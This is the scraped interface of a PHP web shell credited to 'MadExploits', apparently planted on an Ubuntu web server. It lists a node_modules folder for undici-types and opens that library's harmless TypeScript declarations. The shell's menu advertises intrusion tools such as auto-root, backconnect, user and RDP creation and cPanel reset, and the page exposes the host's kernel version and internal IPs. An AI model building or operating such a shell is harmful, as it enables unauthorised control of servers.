Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
node_modules /
undici-types /
[ HOME SHELL ]
Name
Size
Permission
Action
LICENSE
1.06
KB
-rw-r--r--
README.md
455
B
-rw-r--r--
agent.d.ts
1.04
KB
-rw-r--r--
api.d.ts
1.42
KB
-rw-r--r--
balanced-pool.d.ts
961
B
-rw-r--r--
cache.d.ts
1.22
KB
-rw-r--r--
client.d.ts
4.85
KB
-rw-r--r--
connector.d.ts
1
KB
-rw-r--r--
content-type.d.ts
561
B
-rw-r--r--
cookies.d.ts
635
B
-rw-r--r--
diagnostics-channel.d.ts
1.54
KB
-rw-r--r--
dispatcher.d.ts
13.89
KB
-rw-r--r--
env-http-proxy-agent.d.ts
675
B
-rw-r--r--
errors.d.ts
4.18
KB
-rw-r--r--
eventsource.d.ts
1.61
KB
-rw-r--r--
fetch.d.ts
5.44
KB
-rw-r--r--
file.d.ts
1.67
KB
-rw-r--r--
filereader.d.ts
1.4
KB
-rw-r--r--
formdata.d.ts
4.88
KB
-rw-r--r--
global-dispatcher.d.ts
276
B
-rw-r--r--
global-origin.d.ts
175
B
-rw-r--r--
handlers.d.ts
447
B
-rw-r--r--
header.d.ts
133
B
-rw-r--r--
index.d.ts
3.31
KB
-rw-r--r--
interceptors.d.ts
922
B
-rw-r--r--
mock-agent.d.ts
2.48
KB
-rw-r--r--
mock-client.d.ts
1002
B
-rw-r--r--
mock-errors.d.ts
338
B
-rw-r--r--
mock-interceptor.d.ts
3.81
KB
-rw-r--r--
mock-pool.d.ts
974
B
-rw-r--r--
package.json
1.17
KB
-rw-r--r--
patch.d.ts
691
B
-rw-r--r--
pool-stats.d.ts
669
B
-rw-r--r--
pool.d.ts
1.3
KB
-rw-r--r--
proxy-agent.d.ts
780
B
-rw-r--r--
readable.d.ts
1.7
KB
-rw-r--r--
retry-agent.d.ts
232
B
-rw-r--r--
retry-handler.d.ts
2.91
KB
-rw-r--r--
util.d.ts
623
B
-rw-r--r--
webidl.d.ts
5.78
KB
-rw-r--r--
websocket.d.ts
3.75
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.d.ts
import Dispatcher from'./dispatcher' import { setGlobalDispatcher, getGlobalDispatcher } from './global-dispatcher' import { setGlobalOrigin, getGlobalOrigin } from './global-origin' import Pool from'./pool' import { RedirectHandler, DecoratorHandler } from './handlers' import BalancedPool from './balanced-pool' import Client from'./client' import buildConnector from'./connector' import errors from'./errors' import Agent from'./agent' import MockClient from'./mock-client' import MockPool from'./mock-pool' import MockAgent from'./mock-agent' import mockErrors from'./mock-errors' import ProxyAgent from'./proxy-agent' import EnvHttpProxyAgent from './env-http-proxy-agent' import RetryHandler from'./retry-handler' import RetryAgent from'./retry-agent' import { request, pipeline, stream, connect, upgrade } from './api' import interceptors from './interceptors' export * from './util' export * from './cookies' export * from './eventsource' export * from './fetch' export * from './file' export * from './filereader' export * from './formdata' export * from './diagnostics-channel' export * from './websocket' export * from './content-type' export * from './cache' export { Interceptable } from './mock-interceptor' export { Dispatcher, BalancedPool, Pool, Client, buildConnector, errors, Agent, request, stream, pipeline, connect, upgrade, setGlobalDispatcher, getGlobalDispatcher, setGlobalOrigin, getGlobalOrigin, interceptors, MockClient, MockPool, MockAgent, mockErrors, ProxyAgent, EnvHttpProxyAgent, RedirectHandler, DecoratorHandler, RetryHandler, RetryAgent } export default Undici declare namespace Undici { var Dispatcher: typeof import('./dispatcher').default var Pool: typeof import('./pool').default; var RedirectHandler: typeof import ('./handlers').RedirectHandler var DecoratorHandler: typeof import ('./handlers').DecoratorHandler var RetryHandler: typeof import ('./retry-handler').default var createRedirectInterceptor: typeof import ('./interceptors').default.createRedirectInterceptor var BalancedPool: typeof import('./balanced-pool').default; var Client: typeof import('./client').default; var buildConnector: typeof import('./connector').default; var errors: typeof import('./errors').default; var Agent: typeof import('./agent').default; var setGlobalDispatcher: typeof import('./global-dispatcher').setGlobalDispatcher; var getGlobalDispatcher: typeof import('./global-dispatcher').getGlobalDispatcher; var request: typeof import('./api').request; var stream: typeof import('./api').stream; var pipeline: typeof import('./api').pipeline; var connect: typeof import('./api').connect; var upgrade: typeof import('./api').upgrade; var MockClient: typeof import('./mock-client').default; var MockPool: typeof import('./mock-pool').default; var MockAgent: typeof import('./mock-agent').default; var mockErrors: typeof import('./mock-errors').default; var fetch: typeof import('./fetch').fetch; var Headers: typeof import('./fetch').Headers; var Response: typeof import('./fetch').Response; var Request: typeof import('./fetch').Request; var FormData: typeof import('./formdata').FormData; var File: typeof import('./file').File; var FileReader: typeof import('./filereader').FileReader; var caches: typeof import('./cache').caches; var interceptors: typeof import('./interceptors').default; }
Close